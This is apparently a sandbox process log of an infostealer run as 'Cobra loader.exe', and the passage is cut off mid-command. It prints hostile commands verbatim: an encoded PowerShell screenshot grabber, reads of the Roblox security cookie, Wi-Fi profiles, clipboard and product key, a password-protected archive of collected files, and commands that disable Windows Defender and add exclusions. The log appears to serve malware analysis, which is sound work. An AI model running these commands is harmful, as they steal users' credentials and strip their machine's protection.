powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3772

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niee1sa0\niee1sa0.cmdline"
5⤵
PID:3612

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7888.tmp" "c:\Users\Admin\AppData\Local\Temp\niee1sa0\CSCE789F06BCA3A44C1B9E2E4D2BCE552E3.TMP"
6⤵
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:936

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2872

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5540

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:2384

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:1976

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:5656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:4120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
PID:4208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:5956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2384

C:\Windows\system32\getmac.exe
getmac
4⤵
PID:6036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\7Yhc7.zip" *"
3⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\_MEI56522\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI56522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\7Yhc7.zip" *
4⤵
- Executes dropped EXE
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:3088

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:1260

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:6040

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:5000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:5124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:4356

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:1752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:4180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
4⤵
PID:4896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcd38646f8,0x7ffcd3864708,0x7ffcd3864718
2⤵
PID:5636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1960 /prefetch:2
2⤵
PID:1428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 /prefetch:3
2⤵
PID:1064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
2⤵
PID:4424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
2⤵
PID:4872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
2⤵
PID:5424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
2⤵
PID:3812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
2⤵
PID:972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
2⤵
PID:1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5360 /prefetch:8
2⤵
PID:2616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5076 /prefetch:8
2⤵
- Modifies registry class
PID:4572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
2⤵
PID:2952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
2⤵
PID:4088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
2⤵
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
2⤵
PID:1948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
2⤵
PID:4388

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6708 /prefetch:8
2⤵
PID:4180

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6708 /prefetch:8
2⤵
PID:4932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
2⤵
PID:4564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
2⤵
PID:4512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
2⤵
PID:1248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
2⤵
PID:400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,1707079871415686330,4382200501047702203,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3508 /prefetch:2
2⤵
PID:3968

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4856

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
1⤵
- Executes dropped EXE
PID:2496

C:\Users\Admin\Desktop\Cobra loader.exe
"C:\Users\Admin\Desktop\Cobra loader.exe"
2⤵
- Executes dropped EXE
PID:5800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'"
3⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Cobra loader.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:5676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
PID:732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‌ .scr'"
3⤵
PID:3664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‌ .scr'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:3744

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:6108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5916

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:5972

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4880

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5084

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:2480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:3444

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:3572

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA